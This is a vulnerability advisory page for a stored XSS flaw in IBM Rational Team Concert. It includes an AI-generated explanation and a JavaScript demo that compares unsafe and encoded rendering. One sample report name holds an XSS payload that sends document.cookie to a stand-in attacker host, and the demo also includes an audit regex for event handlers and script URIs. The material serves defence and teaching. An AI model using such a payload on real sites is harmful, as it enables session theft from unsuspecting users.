VYPR
Unrated severityNVD Advisory· Published Feb 14, 2011· Updated Apr 29, 2026

CVE-2011-1029

Description

Cross-site scripting (XSS) vulnerability in IBM Rational Team Concert (RTC) 2.0.0.x allows remote authenticated users to inject arbitrary web script or HTML via the name of a shared report.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

IBM Rational Team Concert 2.0.0.x is vulnerable to stored XSS via shared report name, allowing authenticated attackers to inject arbitrary script.

Vulnerability

IBM Rational Team Concert (RTC) 2.0.0.x is vulnerable to a stored cross-site scripting (XSS) vulnerability in the shared report functionality. The application does not encode the user-supplied report name for the HTML context in which it is later displayed. An authenticated attacker can create a shared report whose name contains script or HTML; that name is persisted on the server and rendered, unencoded, to every other user who views the shared report. Affected versions include all releases in the 2.0.0.x stream [1].

Exploitation

To exploit this vulnerability, an attacker needs only valid credentials and the ability to publish shared reports; no administrative rights are required. The attacker saves a report whose name contains arbitrary HTML or JavaScript. Because shared reports are automatically communicated to all team members via Eclipse client RSS feeds, the payload reaches a broad audience without any further action by the attacker [1]. The script executes when a victim views the shared report in the web UI, where the report name is rendered without HTML encoding, so the victim's browser interprets the stored name as markup rather than text.
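The rendering defect described above, shown as an added example in JavaScript. This is not IBM's code and does not reproduce RTC's actual web UI; the function names (renderReportRowUnsafe, renderReportRowSafe, escapeHtml, findSuspiciousReportNames), the sample report records and the attacker hostname are all constructed for illustration. It places a vulnerable string-concatenation renderer beside an output-encoding fix, and adds a heuristic audit you could run over an export of existing shared report names while waiting for the fix pack.

```javascript
// Added example (not IBM's code): how a stored XSS like CVE-2011-1029 arises
// when a stored, user-controlled report name is interpolated into HTML
// unencoded, and what the output-encoding fix looks like. All names below
// are hypothetical; RTC's real rendering code is not shown here.

// Constructed sample data. Report 2 is what an attacker might save as a
// shared report name; report 3 is a benign name that merely contains '<'.
const SAMPLE_REPORTS = [
  { id: 1, owner: "alice", name: "Open defects by component" },
  { id: 2, owner: "mallory",
    name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
  { id: 3, owner: "bob", name: "Sprint burndown <Q3>" },
];

// Minimal HTML entity encoder, adequate for text placed inside an element
// body or inside a double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: markup built by string concatenation, trusting the
// stored name. The name lands in both an attribute and the element body.
function renderReportRowUnsafe(report) {
  return `<li class="report" title="${report.name}">${report.name} (${report.owner})</li>`;
}

// Hardened pattern: every untrusted value is encoded for the HTML context
// it lands in before the string is handed to the browser.
function renderReportRowSafe(report) {
  const name = escapeHtml(report.name);
  const owner = escapeHtml(report.owner);
  return `<li class="report" title="${name}">${name} (${owner})</li>`;
}

// Heuristic audit for names already stored in the repository: flags any
// name containing markup-significant characters, an inline event handler
// or a javascript: URI. Returns the ids to review; expect false positives
// (see report 3). This is a triage aid, not a substitute for encoding.
function findSuspiciousReportNames(reports) {
  const pattern = /[<>"']|javascript:|\bon\w+\s*=/i;
  return reports.filter((r) => pattern.test(r.name)).map((r) => r.id);
}

// Demonstration when run directly.
for (const r of SAMPLE_REPORTS) {
  console.log("unsafe:", renderReportRowUnsafe(r));
  console.log("safe:  ", renderReportRowSafe(r));
}
console.log("flagged report ids:", findSuspiciousReportNames(SAMPLE_REPORTS));
```

The unsafe renderer emits Mallory's name as a live `<img>` tag with an `onerror` handler, which is exactly the condition the advisory describes; the safe renderer emits the same bytes as inert text. The audit deliberately over-flags (report 3 is benign) because a missed payload costs more than a manual review of a few extra rows; encoding at output time, not input filtering, is the actual fix.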

Impact

Successful exploitation allows the attacker to execute arbitrary script in the victim's browser within the origin of the RTC web application. The script can read the victim's session cookies if they are not marked HttpOnly, enabling session hijacking, and in any case can issue authenticated requests to RTC on the victim's behalf. If the victim is a privileged user (e.g., a project owner), the attacker may reach administrative functionality and sensitive project data [1].

Mitigation

IBM addressed this issue as part of APAR PM22477. Users should upgrade to a fixed version of IBM Rational Team Concert. The specific fixed version is not detailed in the available reference; however, it is recommended to apply the latest fix pack for the 2.0.0.x stream or upgrade to a newer release that includes the patch [1].

AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • cpe:2.3:a:ibm:rational_team_concert:2.0.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:ibm:rational_team_concert:2.0.0.2:*:*:*:*:*:*:*
  • (no CPE) range: 2.0.0.x

Patches

No patches discovered yet.

References

5
